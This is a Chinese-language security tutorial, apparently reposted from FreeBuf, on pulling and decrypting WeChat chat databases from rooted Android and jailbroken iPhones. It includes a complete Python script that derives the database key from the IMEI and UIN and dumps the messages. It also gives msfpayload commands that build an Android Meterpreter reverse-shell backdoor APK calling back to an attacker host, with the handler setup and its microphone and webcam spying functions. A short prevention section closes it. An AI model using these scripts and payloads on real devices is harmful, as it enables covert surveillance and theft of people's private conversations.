獲取安卓iOS上的微信聊天記錄、通過Metasploit控制安卓
在這篇文章中我們將討論如何獲取安卓、蘋果裝置中的微信聊天記錄,並演示如何利用後門通過Metasploit對安卓裝置進行控制。文章比較基礎、可動手性強,有裝置的童鞋不妨邊閱讀文章邊操作,希望能激發大家對移動終端的安全興趣。
“如何獲取Android、iPhone手機上的微信聊天記錄? ”
0×00 條件:
安卓裝置已獲取root許可權,安裝SSHDroid(通過ssh、ftp連線手機)
Apple裝置越獄,安裝OpenSSH外掛
0×01 安卓:
很多安卓手機的使用者都會遇到這麼一個尷尬的問題:手機用久了就不知不覺變得慢了,最後慢到什麼都遲鈍了。為了解決這個問題和大多數人一樣我選擇了root裝置。
安卓裝置在root以後可以對系統檔案存在最高級別的操作許可權。比如,你在安卓裝置上安裝了微信,那麼root以後通過adb shell你能對微信App的檔案配置進行讀取修改等操作。
Android應用程式的資料庫檔案通常會儲存在 /data/data/packagename/database 資料夾下,微信App檔案存放路徑為:/data/data/com.tencent.mm/MicroMsg
首先通過FTP把檔案down到本地:
以34位編碼(類似於亂碼)命名的資料夾中可找到微信賬號的加密資料庫檔案 :EnMicroMsg.db
用資料庫管理器開啟:提示加密或者不是資料庫檔案
這裡可以用windows環境下的SQLite Database Browser瀏覽器開啟:
提示輸入密碼:
那麼,加密資料庫使用的密碼是什麼呢?我們又該如何獲取到這個密碼?通過上網查資料瞭解到:微信採用手機的IMEI值和微信UIN值的組合來對資料進行加密。
微信賬號uin:即user information 微信使用者資訊識別碼,獲取微信UIN的方式有兩種:
1.通過微信app的“system_config_prefs.xml”配置檔案獲取微信賬號uin;
2.通過抓取WEB版微信聊天的資料包獲取到uin。
1.1 App 配置檔案
find / -name “system_config_prefs.xml”
/data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml
cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin
<int name="default_uin" value="146****21" />
1.2 谷歌chrome瀏覽器登陸WEB版微信:
登陸後新建視窗並訪問chrome://net-internals/#events
傳送資訊 抓包 find uin值
uin:146****21
通過上述兩種方法找到的uin值是相同的。
安卓撥號介面輸入*#06#獲得手機IMEI碼:354**********85
IMEI值+uin值組合即為354**********85146****21
得到32位小寫md5值:1cbf8b842f8bf650aa65e5d3ced07735取其前七位:1cbf8b8輸入到sql瀏覽器中。
Linux、Mac使用者也可以在終端執行:
echo -n "354**********85146****21" | md5sum | cut -c -7
成功開啟微信的資料庫檔案:
import os
import sys
import re
import hashlib
import csv
import time
import locale
import getopt
def get_db():
os.popen('adb root').close()
text = os.popen(
'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read()
return text.splitlines()[- 1] if text else ''
def get_default_uin():
os.popen('adb root').close()
text = os.popen(
'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()
default_uin = re.findall(
'name="default_uin" value="([0-9]+)"', text)
return default_uin[0] if default_uin else 0
def get_device_ID():
text = os.popen('adb shell dumpsys iphonesubinfo').read()
device_ID = re.findall('Device ID = ([0-9]+)', text)
return device_ID[0] if device_ID else 0
def get_md5():
default_uin = get_default_uin()
device_ID = get_device_ID()
if default_uin and device_ID:
return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7]
return ''
def parse_msgcsv(msgcsv):
locale.setlocale(locale.LC_ALL, '')
if hasattr(msgcsv, 'title'):
msgcsv = [ooOoo0O + '\n' for ooOoo0O in msgcsv.splitlines()]
pass
OooO0 = csv.reader(msgcsv)
OooO0.next()
for ooOoo0O in OooO0:
try:
II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[
: 12]
pass
except:
continue
ooooooO0oo = 'me' if (Oo00OOOOO == '1') else name
IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000)
I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1)
yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0]
pass
pass
def get_names(chat):
names = {}
for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
names[name] = 1
pass
return names.keys()
def oo(chat, name=''):
text = []
name = name.lower()
for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat:
iIi1ii1I1 = iIi1ii1I1.replace('\n', '\n ')
o0 = ('\t' + o0) if o0 else ''
if not name:
text.append('%s: %s %s: %s %s' %
(name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
pass
elif name.lower() == name:
text.append('%s %s: %s %s' %
(I1IIIii, ooooooO0oo, iIi1ii1I1, o0))
pass
pass
return '\n'.join(text) + '\n'
def IIIii1II1II(dbn, key=''):
child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])
if key:
child_stdin.write('PRAGMA key=%s;\n' % ` key `)
child_stdin.write('pragma cipher_use_hmac=off;\n')
pass
child_stdin.write('.tables\n')
child_stdin.close()
return child_stdout.read().split()
def decrypt(dbn, key='', table='message'):
table = table or 'message'
child_stdin, child_stdout = os.popen2(['sqlcipher', dbn])
child_stdin.write('.header on\n')
child_stdin.write('.mode csv\n')
if key:
child_stdin.write('PRAGMA key=%s;\n' % ` key `)
child_stdin.write('pragma cipher_use_hmac=off;\n')
pass
child_stdin.write('select * from %s;\n' % ` table `)
child_stdin.close()
return child_stdout.read()
def wechat2txt(names=[]):
in_file = 'EnMicroMsg.db'
out_file = 'message.csv'
db = get_db()
md5 = get_md5()
os.popen('adb wait-for-device')
os.popen('adb pull %s %s' % (db, in_file)).close()
msgcsv = decrypt(in_file, md5)
if msgcsv.find('\n') < 0:
return 1
file(out_file, 'w').write(msgcsv)
msgs = list(parse_msgcsv(msgcsv))
if not msgs:
return 1
if not names:
names = get_names(msgs)
pass
for name in names:
filename = 'message.%s.txt' % name
text = oo(msgs, name)
if len(text) > 4:
file(filename, 'w').write(text)
pass
pass
pass
help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...
OPTIONS:
-h display this help and exit
'''
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], 'h')
except getopt.error, e:
print help_msg
return 1
for opt, arg in opts:
if opt == '-h':
print help_msg
return 1
pass
names = args
text = wechat2txt(names)
return not text
if __name__ == "__main__":
sys.exit(main())
0×02 蘋果:
Apple裝置越獄後可通過Cydia安裝各種小外掛,通常情況我會安裝OpenSSH來使自己能通過終端連線到Apple裝置中,並使用sftp傳輸檔案:
iOS中,應用資料夾以hash值命名,要匯出微信、QQ的聊天記錄其難度相對安卓來說稍微複雜很多。
在實際操作中我們可以通過巧用Linux命令(find、grep、xargs)來繞過這些坑。
find /var/mobile/Containers/Data -name "MM.sqlite"
mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r {}/../../ /cache
0×03 在安卓終端植入後門
3.1 實驗環境
Kali Linux(Hack):192.168.31.213
Android(靶機):192.168.31.118
3.2生成後門檔案:
cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk
3.3 執行metasploit控制檯
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run
3.4 安裝&執行後門App
後門能進行什麼操作?我們來看看usage:
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
record_mic 通過手機麥克風進行竊聽、錄音;
webcam_list 列出安卓裝置的所有攝像頭;
webcam_snap 通過攝像頭進行偷拍…
等等
0×04 演示視訊
0×05 APK後門分析:
把apk放到apk分析工具(apkStudio、Bytecodeviewer)進行解包,我們來看看後門App的原始碼:
(apkStudio)
在smali/com/metasploit/stage/MainActivity.smali中我們可以找到後門伺服器的ip埠配置:
(apkStudio)
(Bytecodeviewer)
0×06 預防&安全建議
安卓:從可信來源下載應用程式,避免感染惡意程式;在移動充電樁充電前及時關閉USB除錯。
蘋果:越獄後及時修改root密碼,避免使用預設密碼、弱口令。
0×07 文中工具下載地址:
轉載來自FreeBuf黑客與極客